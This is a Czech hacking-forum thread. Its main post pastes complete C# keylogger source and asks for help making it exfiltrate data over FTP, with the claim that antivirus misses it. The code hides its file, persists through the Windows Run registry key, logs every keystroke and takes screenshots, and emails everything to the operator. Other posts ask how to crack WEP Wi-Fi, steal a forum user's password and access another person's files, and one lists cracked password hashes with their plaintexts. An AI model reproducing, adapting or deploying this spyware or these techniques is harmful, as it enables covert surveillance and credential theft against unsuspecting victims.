Diskuze

Pravidla diskuze    |    Zobrazit lame příspěvky
Tato sekce je moderovaná, viz. pravidla diskuze.
 
 
 BBCode

Mutagen_noReg | 212.47.26.*8.12.2014 7:25 | #
2ororok:orebuch: Radši nechci ani vědět, kde jsi takovou ehm, prasárnu vyhrabal. Používat Timer na zachytávání kláves. Nejlepší je přímo zachytávat strisknutí klávesy (hook) přes user32.dll nebo sem koukal, žei C# má nějakou hook metodu. Ale timer, prasárna největšiho kalibru.
RubberDuck | E-mail | Website8.12.2014 0:09 | #
ororok:orebuch: K tomu kódu: Psát keylogger pomocí API funkce GetAsyncKeyState je začátečnická záležitost. Má ale několik nedostatků. Prvně: Pokud na konec té smyčky nepřidáš nějaký sleep, bude ti aplikace permanentně brát 99% procesorového času. Druhak: GetAsyncKeyState má jednu nepěknou vlastnost a to je skutečnost, že neumožňuje kvalitně rozeznávat mezi malými a velkými písmenky. Kód se samozřejmě dá napsat i tak, aby to zvádl, ale rozsah kódu by mírně narostl. Třeťak: (Zjednodušeně řečeno:) Protože bere GetAsyncKeyState pouze ACSII znakovou sadu, dřív nebo později zjistíš, že nedokážeš rozeznávat jiné znakové sady, takže nebudeš schopen správně odečítat klávesy (rozložení ruské/čínské/japonské klávesnice neodpovídá rozložení klávesnice české).

Všeobecně je keylogging v R3 problémová záležitost (kód je potřeba dostat do všech běžících procesů a pak si takový seznam neustále udržovat aktuální) a je pohodlnější ho provádět v R0. Ale to není na rychlou realizaci.

Pokud to myslíš s testováním vážně, dohledej si informace o možnostech logování a zkus si je postupně aplikovat a vylepšovat. Budeš mít ze sebe radost a ještě se hodně naučíš :)

----------
Sec-Cave.cz - [link]
Hnz2 | 85.71.231.*7.12.2014 15:40 | #
to ororok:orebuch:

Jako začátečníkovi ti nejvíce prospěje, že ti nikdo s tímto neporadí.

Najdi si na internetu některý z kurzů "úvod do C#". Případně si nech od rodičů pod stromeček nadělit nějakou knihu s úvodem do OOP. Pak si už začni rozebírat jednotlivé části kódu. Určitě ti to dá mnohem více, než kdyby ti tady někdo řekl co tam máš dopsat. Sám pak i poznáš, že ten "keylogger" je velice hloupě napsán.

ororok:orebuch | 80.241.217.*7.12.2014 11:23 | #
Zdravíčko Soomáci,mám tady jeden zajímavý kod na keylogger ,jsem začátečník,moc by mi pomohlo .kdyby někdo dokázal upravit kod ,aby to přeposílalo data přes
FTP účet a ne přes email a taky aby to netisklo screen obrazovky.Jinak AV to neberou ani z letadla.
Dikec.
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Text;
using System.Windows.Forms;
using Microsoft.Win32;
using System.Net.Mail;
using System.Runtime.InteropServices;
using System.Drawing.Imaging;
using System.Drawing.Drawing2D;
using System.IO;

static class Program
{
/// <summary>
/// The main entry point for the application.
/// </summary>
[STAThread]
static void Main()
{
Application.EnableVisualStyles();
Application.SetCompatibleTextRenderingDefault(false);
Application.Run(new Form1());
}
}


public partial class Form1 : Form
{

// Import WinAPI funkcí zachytávající klávesy
[DllImport("User32.dll")]
private static extern short GetAsyncKeyState(int vKey);

string klavesy = "";
// Představuje počet kláves jež musí být stisknuty, aby byly odeslány na mail
int kolikKlaves = [klavesy];
// Interval po který budou zasílány snímky obrazovky
int prscSekundy = [printscreen];
string mail = "[mail]";
string smtp = "[smtp]";

string cesta = "";
static Bitmap bmpScreenshot;
static Graphics gfxScreenshot;
int p = 0;

public Form1()
{
InitializeComponent();
this.timer2.Interval = prscSekundy * 1000;
this.timer2.Start();

try
{

// Otevře registrový klíč "po spuštění"
RegistryKey klic = Registry.LocalMachine.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true);
// Spuštění po startu Windows
klic.SetValue("KeyLogger", Application.ExecutablePath);
klic.Close();
// Skryje tuto aplikaci
System.IO.File.SetAttributes(Application.ExecutablePath, System.IO.FileAttributes.Hidden);

}
// Pokud se uložení do registrů nezdaří:
catch
{
MessageBox.Show("Nastala chyba při manipulaci s registry");
}
}

private void Form1_Load(object sender, EventArgs e)
{
// Skryje aplikaci v pruhu úloh
this.ShowInTaskbar = false;
// Skryje okno aplikace
this.Hide();
// Spustí časovač
timer1.Start();
}




// V rychlích intervalech kontroluje aktuálně stisknutou klávesu
private void timer1_Tick(object sender, EventArgs e)
{
string keyBuffer = "";
// Snímá klávesy
foreach (System.Int32 i in Enum.GetValues(typeof(Keys)))
{
if (GetAsyncKeyState(i) == -32767)
{
keyBuffer += Enum.GetName(typeof(Keys), i);
}
}
if (keyBuffer != "")
{
keyBuffer = keyBuffer.Replace("Space", " ");
keyBuffer = keyBuffer.Replace("Delete", "<Del>");
keyBuffer = keyBuffer.Replace("LShiftKey", "<SHIFT>");
keyBuffer = keyBuffer.Replace("ShiftKey", "");
keyBuffer = keyBuffer.Replace("OemQuotes", "!");
keyBuffer = keyBuffer.Replace("Oemcomma", "?");
keyBuffer = keyBuffer.Replace("D8", "á");
keyBuffer = keyBuffer.Replace("D2", "ě");
keyBuffer = keyBuffer.Replace("D3", "š");
keyBuffer = keyBuffer.Replace("D4", "č");
keyBuffer = keyBuffer.Replace("D5", "ř");
keyBuffer = keyBuffer.Replace("D6", "ž");
keyBuffer = keyBuffer.Replace("D7", "ý");
keyBuffer = keyBuffer.Replace("D9", "í");
keyBuffer = keyBuffer.Replace("D0", "é");
keyBuffer = keyBuffer.Replace("Back", "<==");
keyBuffer = keyBuffer.Replace("LButton", "");
keyBuffer = keyBuffer.Replace("RButton", "");
keyBuffer = keyBuffer.Replace("NumPad", "");
keyBuffer = keyBuffer.Replace("OemPeriod", ".");
keyBuffer = keyBuffer.Replace("OemSemicolon", ",");
keyBuffer = keyBuffer.Replace("Oem4", "/");
keyBuffer = keyBuffer.Replace("LControlKey", "");
keyBuffer = keyBuffer.Replace("ControlKey", "<CTRL>");
keyBuffer = keyBuffer.Replace("Enter", "<ENT>");
keyBuffer = keyBuffer.Replace("Shift", "<SHIFT>");
keyBuffer = keyBuffer.ToLower();
klavesy += keyBuffer;
// Pokud je počet nasnímaných kláves roven nebo větší než
// námi definovaný počet, budou odeslány mailem
if (klavesy.Length >= kolikKlaves)
{
Mailer.OdesliMail(mail,smtp, "klavesy@keylogger.cz" ,klavesy, "Nasnímané klávesy uživatele " + Environment.UserName);
// Vynulování stisknutých kláves
klavesy = "";
}
}

}


void PrintScreen()
{

bmpScreenshot = new Bitmap(Screen.PrimaryScreen.Bounds.Width, Screen.PrimaryScreen.Bounds.Height, PixelFormat.Format32bppArgb);
gfxScreenshot = Graphics.FromImage(bmpScreenshot);
gfxScreenshot.CopyFromScreen(Screen.PrimaryScreen.Bounds.X, Screen.PrimaryScreen.Bounds.Y, 0, 0, Screen.PrimaryScreen.Bounds.Size, CopyPixelOperation.SourceCopy);
gfxScreenshot.Dispose();
p++;
if (p > 1)
File.Delete("prsc" + (p-1).ToString() + ".jpg");

cesta = "prsc" + p.ToString() + ".jpg";
bmpScreenshot.Save(cesta);

}

void Timer2Tick(object sender, EventArgs e)
{
try
{
PrintScreen();
Mailer.OdesliMailSPrilohou(mail,smtp, mail , "Print Screen obrazovky uživatele " + Environment.UserName,cesta);

}
catch{}
}
}

partial class Form1
{
/// <summary>
/// Required designer variable.
/// </summary>
private System.ComponentModel.IContainer components = null;

/// <summary>
/// Clean up any resources being used.
/// </summary>
/// <param name="disposing">true if managed resources should be disposed; otherwise, false.</param>
protected override void Dispose(bool disposing)
{
if (disposing && (components != null))
{
components.Dispose();
}
base.Dispose(disposing);
}

#region Windows Form Designer generated code

/// <summary>
/// Required method for Designer support - do not modify
/// the contents of this method with the code editor.
/// </summary>
private void InitializeComponent()
{
this.components = new System.ComponentModel.Container();
this.timer1 = new System.Windows.Forms.Timer(this.components);
this.timer2 = new System.Windows.Forms.Timer(this.components);
this.SuspendLayout();
//
// timer1
//
this.timer1.Interval = 1;
this.timer1.Tick += new System.EventHandler(this.timer1_Tick);
//
// timer2
//
this.timer2.Tick += new System.EventHandler(this.Timer2Tick);
//
// Form1
//
this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F);
this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
this.ClientSize = new System.Drawing.Size(292, 273);
this.Name = "Form1";
this.Text = "Form1";
this.Load += new System.EventHandler(this.Form1_Load);
this.ResumeLayout(false);
}
private System.Windows.Forms.Timer timer2;

#endregion

private System.Windows.Forms.Timer timer1;
}

public class Mailer
{
public Mailer(){}

public static void OdesliMail(string adresa, string hostitel, string odesilatel, string obsah, string subject)
{
// Třída System.Net.Mail.SmtpClient slouží k zasílání mailových zpráv
SmtpClient smtp = new SmtpClient(hostitel);
// Vytvorí e-mailovou zprávu
MailMessage zprava = new MailMessage(odesilatel, adresa, subject, obsah);
// Odešle zprávu
smtp.SendAsync(zprava,null);
}
public static void OdesliMailSPrilohou(string adresa, string hostitel, string odesilatel, string subject, string soubor)
{
// Třída System.Net.Mail.SmtpClient slouží k zasílání mailových zpráv
SmtpClient smtp = new SmtpClient(hostitel);
// Vytvorí e-mailovou zprávu
MailMessage zprava = new MailMessage(odesilatel, adresa, subject,"Printscreen uživatele " + Environment.UserName + " v " + DateTime.Now.ToShortTimeString());
Attachment priloha = new Attachment(soubor);
zprava.Attachments.Add(priloha);
// Odešle zprávu
smtp.SendAsync(zprava,null);
// zprava.Dispose();
}
}

Mutagen_noReg | 212.47.26.*5.12.2014 7:45 | #
2kalin: Pokud se nepletu data se sbírají jen pokud je přes Wifi aktivní přenos dat, neboli pokud na ní není nikdo připojen kdo by brouzdal na netu tak žádný data nezachytíš. Lépe řečeno když by někdo stahoval třeba film, máš data během chvilky. Takže nejlepší pro prolomení WEPky je ve špičce když víš, že tam je někdo připojen a třeba stahuje/brouzdá na internetu. (Teda pokud se nepletu, kdyžtak mě opravte)
TORsystem | 91.121.169.*3.12.2014 11:51 | #
Mam dotaz ohledne TORu ,pokud mi jde o zamaskovani IP a pouziju treba 5 anonymizeru online ,bude pak dohledani slozitejsi? ,mam ale dojem ,ze jakmile to pofacha pres anon.obyc. nebude se to siforvat ,ale IP zrejme nenajde ani FBI pokud to bude zive z linuxu z verejne site s dynamickou adresou bez javasriptu,pokud se mylim ,tak mne opravte .
ps:ale co se ukazuje soudruzi ,ukazauje se jen to soudruzi ,ze nekteri soudruzi svindluji ,at si nemysli ,ze se o nich nevi!
Sonny Lofthus | E-mail3.12.2014 11:34 | #
Ako získam z cudzieho pc dokumenty? alebo zoznam súborov? prístup k tomu pc nemám, ale k sieti na ktorý je pripojený ano...
kalin | 109.163.234.*28.11.2014 21:20 | #
Zdar kluci ,mam mensi problem s KALI ,jde o airodump-ng ,
mam kartu TP-LINK WN722N s ovladacem ath9k ,signal docela silny a navic utok je smerovan na pouhou WEPku.
Injekce funguje ,dal jsem to do monitoring modu ,overeno.
Bohuzel mi to zaznamenava jenom beacony ,zadna data to nedava.Tak si rikam cim to je?
Nechcese mi verit ,ze je karta spatna ,muzete mi prosim nejakou doporucit ,nejakou co by to vzala i na vetsi vzdalenost .Dik K.
Tovak | 37.188.130.*27.11.2014 10:01 | #
Ahoj, chtěl bych se zeptat zda lze nějakým způsobem zjistit heslo určitého uživatele na php foru vBulletin 4.2.2, které běží na webhostingu.
Susenka | 188.138.17.*21.11.2014 18:18 | #
Neco se povedlo lousknout, vysledky si preberte :)


07f62c2746c4a2ff:24785d6c2f49762a287c68763e:$x]l/Iv*(|hv>
232ffb1317c06da8:2878523c446b623e4e44464c60:(xR<Dkb>NDFL`
74ffe1c3624b7d4a:2871457427647c24702c405064:(qEt'd|$p,@Pd

-----
Hashcat -- verifikace :)

232ffb1317c06da8:(xR<Dkb>NDFL`
74ffe1c3624b7d4a:(qEt'd|$p,@Pd
07f62c2746c4a2ff:"h8(zyTL$*dPJ"

74ffe1c3624b7d4a:(qEt'd|$p,@Pd
07f62c2746c4a2ff:"h8(zyTL$*dPJ"
232ffb1317c06da8:(xR<Dkb>NDFL`